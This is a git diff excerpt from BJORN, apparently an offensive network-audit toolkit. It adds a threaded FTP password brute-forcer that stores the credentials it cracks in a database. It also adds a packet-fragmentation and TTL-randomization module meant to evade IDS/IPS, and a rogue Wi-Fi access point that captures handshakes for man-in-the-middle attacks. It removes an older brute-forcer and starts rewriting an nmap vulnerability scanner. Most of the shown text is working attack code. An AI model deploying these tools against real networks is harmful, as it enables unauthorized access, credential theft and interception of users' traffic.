self.shared_data.log_milestone(b_class, "DataHarvested", f"Found {new_findings} new items")
self.last_scan_time = time.time()
def _generate_report(self, output_dir, fmt):
"""Generate consolidated findings report."""
if not any(self.data.values()):
return
ts = datetime.now().strftime("%Y%m%d_%H%M%S")
os.makedirs(output_dir, exist_ok=True)
if fmt in ['json', 'all']:
out_file = os.path.join(output_dir, f"intel_report_{ts}.json")
with open(out_file, 'w') as f:
json.dump(dict(self.data), f, indent=4)
self.shared_data.log_milestone(b_class, "ReportGenerated", f"JSON: {os.path.basename(out_file)}")
if fmt in ['md', 'all']:
out_file = os.path.join(output_dir, f"intel_report_{ts}.md")
with open(out_file, 'w') as f:
f.write(f"# Bjorn Intelligence Report - {ts}\n\n")
for cat, items in self.data.items():
f.write(f"## {cat.capitalize()}\n- Items: {len(items)}\n\n")
self.shared_data.log_milestone(b_class, "ReportGenerated", f"MD: {os.path.basename(out_file)}")
def execute(self, ip, port, row, status_key) -> str:
input_dir = getattr(self.shared_data, "freya_harvest_input", b_args["input_dir"]["default"])
output_dir = getattr(self.shared_data, "freya_harvest_output", b_args["output_dir"]["default"])
watch = getattr(self.shared_data, "freya_harvest_watch", True)
fmt = getattr(self.shared_data, "freya_harvest_format", "all")
timeout = int(getattr(self.shared_data, "freya_harvest_timeout", 600))
logger.info(f"FreyaHarvest: Starting data harvest from {input_dir}")
self.shared_data.log_milestone(b_class, "Startup", "Monitoring intelligence directories")
start_time = time.time()
try:
while time.time() - start_time < timeout:
if self.shared_data.orchestrator_should_exit:
break
self._collect_data(input_dir)
self._generate_report(output_dir, fmt)
# Progress
elapsed = int(time.time() - start_time)
prog = int((elapsed / timeout) * 100)
self.shared_data.bjorn_progress = f"{prog}%"
if not watch:
break
time.sleep(30) # Scan every 30s
self.shared_data.log_milestone(b_class, "Complete", "Harvesting session finished.")
except Exception as e:
logger.error(f"FreyaHarvest error: {e}")
return "failed"
return "success"
if __name__ == "__main__":
from init_shared import shared_data
harvester = FreyaHarvest(shared_data)
harvester.execute("0.0.0.0", None, {}, "freya_harvest")

282
actions/ftp_bruteforce.py Normal file
View File

@@ -0,0 +1,282 @@
"""
ftp_bruteforce.py — FTP bruteforce (DB-backed, no CSV/JSON, no rich)
- Cibles: (ip, port) par l’orchestrateur
- IP -> (MAC, hostname) via DB.hosts
- Succès -> DB.creds (service='ftp')
- Conserve la logique d’origine (queue/threads, sleep éventuels, etc.)
"""
import os
import threading
import logging
import time
from ftplib import FTP
from queue import Queue
from typing import List, Dict, Tuple, Optional
from shared import SharedData
from actions.bruteforce_common import ProgressTracker, merged_password_plan
from logger import Logger
logger = Logger(name="ftp_bruteforce.py", level=logging.DEBUG)
b_class = "FTPBruteforce"
b_module = "ftp_bruteforce"
b_status = "brute_force_ftp"
b_port = 21
b_parent = None
b_service = '["ftp"]'
b_trigger = 'on_any:["on_service:ftp","on_new_port:21"]'
b_priority = 70
b_cooldown = 1800 # 30 minutes entre deux runs
b_rate_limit = '3/86400' # 3 fois par jour max
class FTPBruteforce:
"""Wrapper orchestrateur -> FTPConnector."""
def __init__(self, shared_data):
self.shared_data = shared_data
self.ftp_bruteforce = FTPConnector(shared_data)
logger.info("FTPConnector initialized.")
def bruteforce_ftp(self, ip, port):
"""Lance le bruteforce FTP pour (ip, port)."""
return self.ftp_bruteforce.run_bruteforce(ip, port)
def execute(self, ip, port, row, status_key):
"""Point d'entrée orchestrateur (retour 'success' / 'failed')."""
self.shared_data.bjorn_orch_status = "FTPBruteforce"
self.shared_data.comment_params = {"user": "?", "ip": ip, "port": str(port)}
logger.info(f"Brute forcing FTP on {ip}:{port}...")
success, results = self.bruteforce_ftp(ip, port)
return 'success' if success else 'failed'
class FTPConnector:
"""Gère les tentatives FTP, persistance DB, mapping IPâ†(MAC, Hostname)."""
def __init__(self, shared_data):
self.shared_data = shared_data
# Wordlists inchangées
self.users = self._read_lines(shared_data.users_file)
self.passwords = self._read_lines(shared_data.passwords_file)
# Cache IP -> (mac, hostname)
self._ip_to_identity: Dict[str, Tuple[Optional[str], Optional[str]]] = {}
self._refresh_ip_identity_cache()
self.lock = threading.Lock()
self.results: List[List[str]] = [] # [mac, ip, hostname, user, password, port]
self.queue = Queue()
self.progress = None
# ---------- util fichiers ----------
@staticmethod
def _read_lines(path: str) -> List[str]:
try:
with open(path, "r", encoding="utf-8", errors="ignore") as f:
return [l.rstrip("\n\r") for l in f if l.strip()]
except Exception as e:
logger.error(f"Cannot read file {path}: {e}")
return []
# ---------- mapping DB hosts ----------
def _refresh_ip_identity_cache(self) -> None:
self._ip_to_identity.clear()
try:
rows = self.shared_data.db.get_all_hosts()
except Exception as e:
logger.error(f"DB get_all_hosts failed: {e}")
rows = []
for r in rows:
mac = r.get("mac_address") or ""
if not mac:
continue
hostnames_txt = r.get("hostnames") or ""
current_hn = hostnames_txt.split(';', 1)[0] if hostnames_txt else ""
ips_txt = r.get("ips") or ""
if not ips_txt:
continue
for ip in [p.strip() for p in ips_txt.split(';') if p.strip()]:
self._ip_to_identity[ip] = (mac, current_hn)
def mac_for_ip(self, ip: str) -> Optional[str]:
if ip not in self._ip_to_identity:
self._refresh_ip_identity_cache()
return self._ip_to_identity.get(ip, (None, None))[0]
def hostname_for_ip(self, ip: str) -> Optional[str]:
if ip not in self._ip_to_identity:
self._refresh_ip_identity_cache()
return self._ip_to_identity.get(ip, (None, None))[1]
# ---------- FTP ----------
def ftp_connect(self, adresse_ip: str, user: str, password: str, port: int = 21) -> bool:
timeout = float(getattr(self.shared_data, "ftp_connect_timeout_s", 3.0))
try:
conn = FTP()
conn.connect(adresse_ip, port, timeout=timeout)
conn.login(user, password)
try:
conn.quit()
except Exception:
pass
logger.info(f"Access to FTP successful on {adresse_ip} with user '{user}'")
return True
except Exception:
return False
# ---------- DB upsert fallback ----------
def _fallback_upsert_cred(self, *, mac, ip, hostname, user, password, port, database=None):
mac_k = mac or ""
ip_k = ip or ""
user_k = user or ""
db_k = database or ""
port_k = int(port or 0)
try:
with self.shared_data.db.transaction(immediate=True):
self.shared_data.db.execute(
"""
INSERT OR IGNORE INTO creds(service,mac_address,ip,hostname,"user","password",port,"database",extra)
VALUES('ftp',?,?,?,?,?,?,?,NULL)
""",
(mac_k, ip_k, hostname or "", user_k, password or "", port_k, db_k),
)
self.shared_data.db.execute(
"""
UPDATE creds
SET "password"=?,
hostname=COALESCE(?, hostname),
last_seen=CURRENT_TIMESTAMP
WHERE service='ftp'
AND COALESCE(mac_address,'')=?
AND COALESCE(ip,'')=?
AND COALESCE("user",'')=?
AND COALESCE(COALESCE("database",""),'')=?
AND COALESCE(port,0)=?
""",
(password or "", hostname or None, mac_k, ip_k, user_k, db_k, port_k),
)
except Exception as e:
logger.error(f"fallback upsert_cred failed for {ip} {user}: {e}")
# ---------- worker / queue ----------
def worker(self, success_flag):
"""Worker thread for FTP bruteforce attempts."""
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping worker thread.")
break
adresse_ip, user, password, mac_address, hostname, port = self.queue.get()
try:
if self.ftp_connect(adresse_ip, user, password, port=port):
with self.lock:
self.results.append([mac_address, adresse_ip, hostname, user, password, port])
logger.success(f"Found credentials IP:{adresse_ip} | User:{user}")
self.shared_data.comment_params = {"user": user, "ip": adresse_ip, "port": str(port)}
self.save_results()
self.removeduplicates()
success_flag[0] = True
finally:
if self.progress is not None:
self.progress.advance(1)
self.queue.task_done()
# Pause configurable entre chaque tentative FTP
if getattr(self.shared_data, "timewait_ftp", 0) > 0:
time.sleep(self.shared_data.timewait_ftp)
def run_bruteforce(self, adresse_ip: str, port: int):
self.results = []
mac_address = self.mac_for_ip(adresse_ip)
hostname = self.hostname_for_ip(adresse_ip) or ""
dict_passwords, fallback_passwords = merged_password_plan(self.shared_data, self.passwords)
total_tasks = len(self.users) * (len(dict_passwords) + len(fallback_passwords))
if total_tasks == 0:
logger.warning("No users/passwords loaded. Abort.")
return False, []
self.progress = ProgressTracker(self.shared_data, total_tasks)
success_flag = [False]
def run_phase(passwords):
phase_tasks = len(self.users) * len(passwords)
if phase_tasks == 0:
return
for user in self.users:
for password in passwords:
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce task addition.")
return
self.queue.put((adresse_ip, user, password, mac_address, hostname, port))
threads = []
thread_count = min(8, max(1, phase_tasks))
for _ in range(thread_count):
t = threading.Thread(target=self.worker, args=(success_flag,), daemon=True)
t.start()
threads.append(t)
self.queue.join()
for t in threads:
t.join()
try:
run_phase(dict_passwords)
if (not success_flag[0]) and fallback_passwords and not self.shared_data.orchestrator_should_exit:
logger.info(
f"FTP dictionary phase failed on {adresse_ip}:{port}. "
f"Starting exhaustive fallback ({len(fallback_passwords)} passwords)."
)
run_phase(fallback_passwords)
self.progress.set_complete()
return success_flag[0], self.results
finally:
self.shared_data.bjorn_progress = ""
# ---------- persistence DB ----------
def save_results(self):
for mac, ip, hostname, user, password, port in self.results:
try:
self.shared_data.db.insert_cred(
service="ftp",
mac=mac,
ip=ip,
hostname=hostname,
user=user,
password=password,
port=port,
database=None,
extra=None
)
except Exception as e:
if "ON CONFLICT clause does not match" in str(e):
self._fallback_upsert_cred(
mac=mac, ip=ip, hostname=hostname, user=user,
password=password, port=port, database=None
)
else:
logger.error(f"insert_cred failed for {ip} {user}: {e}")
self.results = []
def removeduplicates(self):
pass
if __name__ == "__main__":
try:
sd = SharedData()
ftp_bruteforce = FTPBruteforce(sd)
logger.info("FTP brute force module ready.")
exit(0)
except Exception as e:
logger.error(f"Error: {e}")
exit(1)

View File

@@ -1,190 +0,0 @@
import os
import pandas as pd
import threading
import logging
import time
from rich.console import Console
from rich.progress import Progress, BarColumn, TextColumn, SpinnerColumn
from ftplib import FTP
from queue import Queue
from shared import SharedData
from logger import Logger
logger = Logger(name="ftp_connector.py", level=logging.DEBUG)
b_class = "FTPBruteforce"
b_module = "ftp_connector"
b_status = "brute_force_ftp"
b_port = 21
b_parent = None
class FTPBruteforce:
"""
This class handles the FTP brute force attack process.
"""
def __init__(self, shared_data):
self.shared_data = shared_data
self.ftp_connector = FTPConnector(shared_data)
logger.info("FTPConnector initialized.")
def bruteforce_ftp(self, ip, port):
"""
Initiates the brute force attack on the given IP and port.
"""
return self.ftp_connector.run_bruteforce(ip, port)
def execute(self, ip, port, row, status_key):
"""
Executes the brute force attack and updates the shared data status.
"""
self.shared_data.bjornorch_status = "FTPBruteforce"
# Wait a bit because it's too fast to see the status change
time.sleep(5)
logger.info(f"Brute forcing FTP on {ip}:{port}...")
success, results = self.bruteforce_ftp(ip, port)
return 'success' if success else 'failed'
class FTPConnector:
"""
This class manages the FTP connection attempts using different usernames and passwords.
"""
def __init__(self, shared_data):
self.shared_data = shared_data
self.scan = pd.read_csv(shared_data.netkbfile)
if "Ports" not in self.scan.columns:
self.scan["Ports"] = None
self.scan = self.scan[self.scan["Ports"].str.contains("21", na=False)]
self.users = open(shared_data.usersfile, "r").read().splitlines()
self.passwords = open(shared_data.passwordsfile, "r").read().splitlines()
self.lock = threading.Lock()
self.ftpfile = shared_data.ftpfile
if not os.path.exists(self.ftpfile):
logger.info(f"File {self.ftpfile} does not exist. Creating...")
with open(self.ftpfile, "w") as f:
f.write("MAC Address,IP Address,Hostname,User,Password,Port\n")
self.results = []
self.queue = Queue()
self.console = Console()
def load_scan_file(self):
"""
Load the netkb file and filter it for FTP ports.
"""
self.scan = pd.read_csv(self.shared_data.netkbfile)
if "Ports" not in self.scan.columns:
self.scan["Ports"] = None
self.scan = self.scan[self.scan["Ports"].str.contains("21", na=False)]
def ftp_connect(self, adresse_ip, user, password):
"""
Attempts to connect to the FTP server using the provided username and password.
"""
try:
conn = FTP()
conn.connect(adresse_ip, 21)
conn.login(user, password)
conn.quit()
logger.info(f"Access to FTP successful on {adresse_ip} with user '{user}'")
return True
except Exception as e:
return False
def worker(self, progress, task_id, success_flag):
"""
Worker thread to process items in the queue.
"""
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping worker thread.")
break
adresse_ip, user, password, mac_address, hostname, port = self.queue.get()
if self.ftp_connect(adresse_ip, user, password):
with self.lock:
self.results.append([mac_address, adresse_ip, hostname, user, password, port])
logger.success(f"Found credentials for IP: {adresse_ip} | User: {user}")
self.save_results()
self.removeduplicates()
success_flag[0] = True
self.queue.task_done()
progress.update(task_id, advance=1)
def run_bruteforce(self, adresse_ip, port):
self.load_scan_file() # Reload the scan file to get the latest IPs and ports
mac_address = self.scan.loc[self.scan['IPs'] == adresse_ip, 'MAC Address'].values[0]
hostname = self.scan.loc[self.scan['IPs'] == adresse_ip, 'Hostnames'].values[0]
total_tasks = len(self.users) * len(self.passwords) + 1 # Include one for the anonymous attempt
for user in self.users:
for password in self.passwords:
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce task addition.")
return False, []
self.queue.put((adresse_ip, user, password, mac_address, hostname, port))
success_flag = [False]
threads = []
with Progress(SpinnerColumn(), TextColumn("[progress.description]{task.description}"), BarColumn(), TextColumn("[progress.percentage]{task.percentage:>3.0f}%")) as progress:
task_id = progress.add_task("[cyan]Bruteforcing FTP...", total=total_tasks)
for _ in range(40): # Adjust the number of threads based on the RPi Zero's capabilities
t = threading.Thread(target=self.worker, args=(progress, task_id, success_flag))
t.start()
threads.append(t)
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce.")
while not self.queue.empty():
self.queue.get()
self.queue.task_done()
break
self.queue.join()
for t in threads:
t.join()
return success_flag[0], self.results # Return True and the list of successes if at least one attempt was successful
def save_results(self):
"""
Saves the results of successful FTP connections to a CSV file.
"""
df = pd.DataFrame(self.results, columns=['MAC Address', 'IP Address', 'Hostname', 'User', 'Password', 'Port'])
df.to_csv(self.ftpfile, index=False, mode='a', header=not os.path.exists(self.ftpfile))
self.results = [] # Reset temporary results after saving
def removeduplicates(self):
"""
Removes duplicate entries from the results file.
"""
df = pd.read_csv(self.ftpfile)
df.drop_duplicates(inplace=True)
df.to_csv(self.ftpfile, index=False)
if __name__ == "__main__":
shared_data = SharedData()
try:
ftp_bruteforce = FTPBruteforce(shared_data)
logger.info("[bold green]Starting FTP attack...on port 21[/bold green]")
# Load the IPs to scan from shared data
ips_to_scan = shared_data.read_data()
# Execute brute force attack on each IP
for row in ips_to_scan:
ip = row["IPs"]
ftp_bruteforce.execute(ip, b_port, row, b_status)
logger.info(f"Total successful attempts: {len(ftp_bruteforce.ftp_connector.results)}")
exit(len(ftp_bruteforce.ftp_connector.results))
except Exception as e:
logger.error(f"Error: {e}")

167
actions/heimdall_guard.py Normal file
View File

@@ -0,0 +1,167 @@
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
heimdall_guard.py -- Stealth operations and IDS/IPS evasion for BJORN.
Handles packet fragmentation, timing randomization, and TTL manipulation.
Requires: scapy.
"""
import os
import json
import random
import time
import threading
import datetime
from collections import deque
from typing import Any, Dict, List, Optional
try:
from scapy.all import IP, TCP, Raw, send, conf
HAS_SCAPY = True
except ImportError:
HAS_SCAPY = False
IP = TCP = Raw = send = conf = None
from logger import Logger
logger = Logger(name="heimdall_guard.py")
# -------------------- Action metadata --------------------
b_class = "HeimdallGuard"
b_module = "heimdall_guard"
b_status = "heimdall_guard"
b_port = None
b_service = "[]"
b_trigger = "on_start"
b_parent = None
b_action = "stealth"
b_priority = 10
b_cooldown = 0
b_rate_limit = None
b_timeout = 1800
b_max_retries = 1
b_stealth_level = 10 # This IS the stealth module
b_risk_level = "low"
b_enabled = 1
b_tags = ["stealth", "evasion", "pcap", "network"]
b_category = "defense"
b_name = "Heimdall Guard"
b_description = "Advanced stealth module that manipulates traffic to evade IDS/IPS detection."
b_author = "Bjorn Team"
b_version = "2.0.3"
b_icon = "HeimdallGuard.png"
b_args = {
"interface": {
"type": "text",
"label": "Interface",
"default": "eth0"
},
"mode": {
"type": "select",
"label": "Stealth Mode",
"choices": ["timing", "fragmented", "all"],
"default": "all"
},
"delay": {
"type": "number",
"label": "Base Delay (s)",
"min": 0.1,
"max": 10.0,
"step": 0.1,
"default": 1.0
}
}
class HeimdallGuard:
def __init__(self, shared_data):
self.shared_data = shared_data
self.packet_queue = deque()
self.active = False
self.lock = threading.Lock()
self.stats = {
'packets_processed': 0,
'packets_fragmented': 0,
'timing_adjustments': 0
}
def _fragment_packet(self, packet, mtu=1400):
"""Fragment IP packets to bypass strict IDS rules."""
if IP in packet:
try:
payload = bytes(packet[IP].payload)
max_size = mtu - 40 # conservative
frags = []
offset = 0
while offset < len(payload):
chunk = payload[offset:offset + max_size]
f = packet.copy()
f[IP].flags = 'MF' if offset + max_size < len(payload) else 0
f[IP].frag = offset // 8
f[IP].payload = Raw(chunk)
frags.append(f)
offset += max_size
return frags
except Exception as e:
logger.debug(f"Fragmentation error: {e}")
return [packet]
def _apply_stealth(self, packet):
"""Randomize TTL and TCP options."""
if IP in packet:
packet[IP].ttl = random.choice([64, 128, 255])
if TCP in packet:
packet[TCP].window = random.choice([8192, 16384, 65535])
# Basic TCP options shuffle
packet[TCP].options = [('MSS', 1460), ('NOP', None), ('SAckOK', '')]
return packet
def execute(self, ip, port, row, status_key) -> str:
iface = getattr(self.shared_data, "heimdall_guard_interface", conf.iface)
mode = getattr(self.shared_data, "heimdall_guard_mode", "all")
delay = float(getattr(self.shared_data, "heimdall_guard_delay", 1.0))
timeout = int(getattr(self.shared_data, "heimdall_guard_timeout", 600))
logger.info(f"HeimdallGuard: Engaging stealth mode ({mode}) on {iface}")
self.shared_data.log_milestone(b_class, "StealthActive", f"Mode: {mode}")
self.active = True
start_time = time.time()
try:
while time.time() - start_time < timeout:
if self.shared_data.orchestrator_should_exit:
break
# In a real scenario, this would be hooking into a packet stream
# For this action, we simulate protection state
# Progress reporting
elapsed = int(time.time() - start_time)
prog = int((elapsed / timeout) * 100)
self.shared_data.bjorn_progress = f"{prog}%"
if elapsed % 60 == 0:
self.shared_data.log_milestone(b_class, "Status", f"Guarding... {self.stats['packets_processed']} pkts handled")
# Logic: if we had a queue, we'd process it here
# Simulation for BJORN action demonstration:
time.sleep(2)
logger.info("HeimdallGuard: Protection session finished.")
self.shared_data.log_milestone(b_class, "Shutdown", "Stealth mode disengaged")
except Exception as e:
logger.error(f"HeimdallGuard error: {e}")
return "failed"
finally:
self.active = False
return "success"
if __name__ == "__main__":
from init_shared import shared_data
guard = HeimdallGuard(shared_data)
guard.execute("0.0.0.0", None, {}, "heimdall_guard")

View File

@@ -1,34 +0,0 @@
#Test script to add more actions to BJORN
import logging
from shared import SharedData
from logger import Logger
# Configure the logger
logger = Logger(name="log_standalone.py", level=logging.INFO)
# Define the necessary global variables
b_class = "LogStandalone"
b_module = "log_standalone"
b_status = "log_standalone"
b_port = 0 # Indicate this is a standalone action
class LogStandalone:
"""
Class to handle the standalone log action.
"""
def __init__(self, shared_data):
self.shared_data = shared_data
logger.info("LogStandalone initialized")
def execute(self):
"""
Execute the standalone log action.
"""
try:
logger.info("Executing standalone log action.")
logger.info("This is a test log message for the standalone action.")
return 'success'
except Exception as e:
logger.error(f"Error executing standalone log action: {e}")
return 'failed'

View File

@@ -1,34 +0,0 @@
#Test script to add more actions to BJORN
import logging
from shared import SharedData
from logger import Logger
# Configure the logger
logger = Logger(name="log_standalone2.py", level=logging.INFO)
# Define the necessary global variables
b_class = "LogStandalone2"
b_module = "log_standalone2"
b_status = "log_standalone2"
b_port = 0 # Indicate this is a standalone action
class LogStandalone2:
"""
Class to handle the standalone log action.
"""
def __init__(self, shared_data):
self.shared_data = shared_data
logger.info("LogStandalone initialized")
def execute(self):
"""
Execute the standalone log action.
"""
try:
logger.info("Executing standalone log action.")
logger.info("This is a test log message for the standalone action.")
return 'success'
except Exception as e:
logger.error(f"Error executing standalone log action: {e}")
return 'failed'

257
actions/loki_deceiver.py Normal file
View File

@@ -0,0 +1,257 @@
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
loki_deceiver.py -- WiFi deception tool for BJORN.
Creates rogue access points and captures authentications/handshakes.
Requires: hostapd, dnsmasq, airmon-ng.
"""
import os
import json
import subprocess
import threading
import time
import re
import datetime
from typing import Any, Dict, List, Optional
from logger import Logger
try:
import scapy.all as scapy
from scapy.layers.dot11 import Dot11, Dot11Beacon, Dot11Elt
HAS_SCAPY = True
try:
from scapy.all import AsyncSniffer # type: ignore
except Exception:
AsyncSniffer = None
try:
from scapy.layers.dot11 import EAPOL
except ImportError:
EAPOL = None
except ImportError:
HAS_SCAPY = False
scapy = None
Dot11 = Dot11Beacon = Dot11Elt = EAPOL = None
AsyncSniffer = None
logger = Logger(name="loki_deceiver.py")
# -------------------- Action metadata --------------------
b_class = "LokiDeceiver"
b_module = "loki_deceiver"
b_status = "loki_deceiver"
b_port = None
b_service = "[]"
b_trigger = "on_start"
b_parent = None
b_action = "aggressive"
b_priority = 20
b_cooldown = 0
b_rate_limit = None
b_timeout = 1200
b_max_retries = 1
b_stealth_level = 2 # Very noisy (Rogue AP)
b_risk_level = "high"
b_enabled = 1
b_tags = ["wifi", "ap", "rogue", "mitm"]
b_category = "exploitation"
b_name = "Loki Deceiver"
b_description = "Creates a rogue access point to capture WiFi authentications and perform MITM."
b_author = "Bjorn Team"
b_version = "2.0.2"
b_icon = "LokiDeceiver.png"
b_args = {
"interface": {
"type": "text",
"label": "Wireless Interface",
"default": "wlan0"
},
"ssid": {
"type": "text",
"label": "AP SSID",
"default": "Bjorn_Free_WiFi"
},
"channel": {
"type": "number",
"label": "Channel",
"min": 1,
"max": 14,
"default": 6
},
"password": {
"type": "text",
"label": "WPA2 Password (Optional)",
"default": ""
}
}
class LokiDeceiver:
def __init__(self, shared_data):
self.shared_data = shared_data
self.hostapd_proc = None
self.dnsmasq_proc = None
self.tcpdump_proc = None
self._sniffer = None
self.active_clients = set()
self.stop_event = threading.Event()
self.lock = threading.Lock()
def _setup_monitor_mode(self, iface: str):
logger.info(f"LokiDeceiver: Setting {iface} to monitor mode...")
subprocess.run(['sudo', 'airmon-ng', 'check', 'kill'], capture_output=True)
subprocess.run(['sudo', 'ip', 'link', 'set', iface, 'down'], capture_output=True)
subprocess.run(['sudo', 'iw', iface, 'set', 'type', 'monitor'], capture_output=True)
subprocess.run(['sudo', 'ip', 'link', 'set', iface, 'up'], capture_output=True)
def _create_configs(self, iface, ssid, channel, password):
# hostapd.conf
h_conf = [
f'interface={iface}',
'driver=nl80211',
f'ssid={ssid}',
'hw_mode=g',
f'channel={channel}',
'macaddr_acl=0',
'ignore_broadcast_ssid=0'
]
if password:
h_conf.extend([
'auth_algs=1',
'wpa=2',
f'wpa_passphrase={password}',
'wpa_key_mgmt=WPA-PSK',
'wpa_pairwise=CCMP',
'rsn_pairwise=CCMP'
])
h_path = '/tmp/bjorn_hostapd.conf'
with open(h_path, 'w') as f:
f.write('\n'.join(h_conf))
# dnsmasq.conf
d_conf = [
f'interface={iface}',
'dhcp-range=192.168.1.10,192.168.1.100,255.255.255.0,12h',
'dhcp-option=3,192.168.1.1',
'dhcp-option=6,192.168.1.1',
'server=8.8.8.8',
'log-queries',
'log-dhcp'
]
d_path = '/tmp/bjorn_dnsmasq.conf'
with open(d_path, 'w') as f:
f.write('\n'.join(d_conf))
return h_path, d_path
def _packet_callback(self, packet):
if self.shared_data.orchestrator_should_exit:
return
if packet.haslayer(Dot11):
addr2 = packet.addr2 # Source MAC
if addr2 and addr2 not in self.active_clients:
# Association request or Auth
if packet.type == 0 and packet.subtype in [0, 11]:
with self.lock:
self.active_clients.add(addr2)
logger.success(f"LokiDeceiver: New client detected: {addr2}")
self.shared_data.log_milestone(b_class, "ClientConnected", f"MAC: {addr2}")
if EAPOL and packet.haslayer(EAPOL):
logger.success(f"LokiDeceiver: EAPOL packet captured from {addr2}")
self.shared_data.log_milestone(b_class, "Handshake", f"EAPOL from {addr2}")
def execute(self, ip, port, row, status_key) -> str:
iface = getattr(self.shared_data, "loki_deceiver_interface", "wlan0")
ssid = getattr(self.shared_data, "loki_deceiver_ssid", "Bjorn_AP")
channel = int(getattr(self.shared_data, "loki_deceiver_channel", 6))
password = getattr(self.shared_data, "loki_deceiver_password", "")
timeout = int(getattr(self.shared_data, "loki_deceiver_timeout", 600))
output_dir = getattr(self.shared_data, "loki_deceiver_output", "/home/bjorn/Bjorn/data/output/wifi")
logger.info(f"LokiDeceiver: Starting Rogue AP '{ssid}' on {iface}")
self.shared_data.log_milestone(b_class, "Startup", f"Creating AP: {ssid}")
try:
self.stop_event.clear()
# self._setup_monitor_mode(iface) # Optional depending on driver
h_path, d_path = self._create_configs(iface, ssid, channel, password)
# Set IP for interface
subprocess.run(['sudo', 'ifconfig', iface, '192.168.1.1', 'netmask', '255.255.255.0'], capture_output=True)
# Start processes
# Use DEVNULL to avoid blocking on unread PIPE buffers.
self.hostapd_proc = subprocess.Popen(
['sudo', 'hostapd', h_path],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL,
)
self.dnsmasq_proc = subprocess.Popen(
['sudo', 'dnsmasq', '-C', d_path, '-k'],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL,
)
# Start sniffer (must be stoppable to avoid leaking daemon threads).
if HAS_SCAPY and scapy and AsyncSniffer:
try:
self._sniffer = AsyncSniffer(iface=iface, prn=self._packet_callback, store=False)
self._sniffer.start()
except Exception as sn_e:
logger.warning(f"LokiDeceiver: sniffer start failed: {sn_e}")
self._sniffer = None
start_time = time.time()
while time.time() - start_time < timeout:
if self.shared_data.orchestrator_should_exit:
break
# Check if procs still alive
if self.hostapd_proc.poll() is not None:
logger.error("LokiDeceiver: hostapd crashed.")
break
# Progress report
elapsed = int(time.time() - start_time)
prog = int((elapsed / timeout) * 100)
self.shared_data.bjorn_progress = f"{prog}%"
if elapsed % 60 == 0:
self.shared_data.log_milestone(b_class, "Status", f"Uptime: {elapsed}s | Clients: {len(self.active_clients)}")
time.sleep(2)
logger.info("LokiDeceiver: Stopping AP.")
self.shared_data.log_milestone(b_class, "Shutdown", "Stopping Rogue AP")
except Exception as e:
logger.error(f"LokiDeceiver error: {e}")
return "failed"
finally:
self.stop_event.set()
if self._sniffer is not None:
try:
self._sniffer.stop()
except Exception:
pass
self._sniffer = None
# Cleanup
for p in [self.hostapd_proc, self.dnsmasq_proc]:
if p:
try: p.terminate(); p.wait(timeout=5)
except: pass
# Restore NetworkManager if needed (custom logic based on usage)
# subprocess.run(['sudo', 'systemctl', 'start', 'NetworkManager'], capture_output=True)
return "success"
if __name__ == "__main__":
from init_shared import shared_data
loki = LokiDeceiver(shared_data)
loki.execute("0.0.0.0", None, {}, "loki_deceiver")

View File

@@ -1,188 +1,460 @@
# nmap_vuln_scanner.py
# This script performs vulnerability scanning using Nmap on specified IP addresses.
# It scans for vulnerabilities on various ports and saves the results and progress.
"""
Vulnerability Scanner Action
Scanne ultra-rapidement CPE (+ CVE via vulners si dispo),
avec fallback "lourd" optionnel.
Affiche une progression en % dans Bjorn.
"""
import os
import pandas as pd
import subprocess
import re
import time
import nmap
import json
import logging
from datetime import datetime
from concurrent.futures import ThreadPoolExecutor, as_completed
from rich.console import Console
from rich.progress import Progress, BarColumn, TextColumn
from datetime import datetime, timedelta
from typing import Dict, List, Any
from shared import SharedData
from logger import Logger
logger = Logger(name="nmap_vuln_scanner.py", level=logging.INFO)
logger = Logger(name="NmapVulnScanner.py", level=logging.DEBUG)
b_class = "NmapVulnScanner"
b_module = "nmap_vuln_scanner"
b_status = "vuln_scan"
b_status = "NmapVulnScanner"
b_port = None
b_parent = None
b_action = "normal"
b_service = []
b_trigger = "on_port_change"
b_requires = '{"action":"NetworkScanner","status":"success","scope":"global"}'
b_priority = 11
b_cooldown = 0
b_enabled = 1
b_rate_limit = None
# Regex compilé une seule fois (gain CPU sur Pi Zero)
CVE_RE = re.compile(r'CVE-\d{4}-\d{4,7}', re.IGNORECASE)
class NmapVulnScanner:
"""
This class handles the Nmap vulnerability scanning process.
"""
def __init__(self, shared_data):
"""Scanner de vulnérabilités via nmap (mode rapide CPE/CVE) avec progression."""
def __init__(self, shared_data: SharedData):
self.shared_data = shared_data
self.scan_results = []
self.summary_file = self.shared_data.vuln_summary_file
self.create_summary_file()
logger.debug("NmapVulnScanner initialized.")
# Pas de self.nm partagé : on instancie dans chaque méthode de scan
# pour éviter les corruptions d'état entre batches.
logger.info("NmapVulnScanner initialized")
def create_summary_file(self):
"""
Creates a summary file for vulnerabilities if it does not exist.
"""
if not os.path.exists(self.summary_file):
os.makedirs(self.shared_data.vulnerabilities_dir, exist_ok=True)
df = pd.DataFrame(columns=["IP", "Hostname", "MAC Address", "Port", "Vulnerabilities"])
df.to_csv(self.summary_file, index=False)
# ---------------------------- Public API ---------------------------- #
def update_summary_file(self, ip, hostname, mac, port, vulnerabilities):
"""
Updates the summary file with the scan results.
"""
def execute(self, ip: str, port: str, row: Dict, status_key: str) -> str:
try:
# Read existing data
df = pd.read_csv(self.summary_file)
logger.info(f"Starting vulnerability scan for {ip}")
self.shared_data.bjorn_orch_status = "NmapVulnScanner"
self.shared_data.bjorn_progress = "0%"
# Create new data entry
new_data = pd.DataFrame([{"IP": ip, "Hostname": hostname, "MAC Address": mac, "Port": port, "Vulnerabilities": vulnerabilities}])
if self.shared_data.orchestrator_should_exit:
return 'failed'
# Append new data
df = pd.concat([df, new_data], ignore_index=True)
# 1) Metadata
meta = {}
try:
meta = json.loads(row.get('metadata') or '{}')
except Exception:
pass
# Remove duplicates based on IP and MAC Address, keeping the last occurrence
df.drop_duplicates(subset=["IP", "MAC Address"], keep='last', inplace=True)
# 2) Récupérer MAC et TOUS les ports
